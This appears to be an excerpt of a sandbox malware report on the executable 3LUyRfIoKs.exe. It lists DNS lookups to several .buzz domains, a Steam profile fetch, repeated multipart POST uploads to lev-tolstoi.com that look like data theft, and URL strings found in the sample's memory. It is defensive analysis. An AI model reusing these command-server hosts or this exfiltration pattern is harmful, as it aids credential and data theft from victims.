                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DXFUN3R3CEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12787Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TYYEVX5PBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15023Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RLS0B21M9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20513Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DXSZON86U9QPW6QDNTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1269Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X7RLJH0RQFVBV0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551089Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=f9e54bfcb159df67606b40d3; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 28 Dec 2024 08:56:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ampowered.com/ https://www.youtube.com hD equals www.youtube.com (Youtube)
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playM equals www.youtube.com (Youtube)
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2269185340.0000000001396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268860714.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/pr
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2240597275.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2265413562.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2265583119.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.n
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2294656929.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298554589.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfon
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.st
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192897595.0000000001396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/commun
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170200355.0000000001396000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192749451.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.0000000001397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
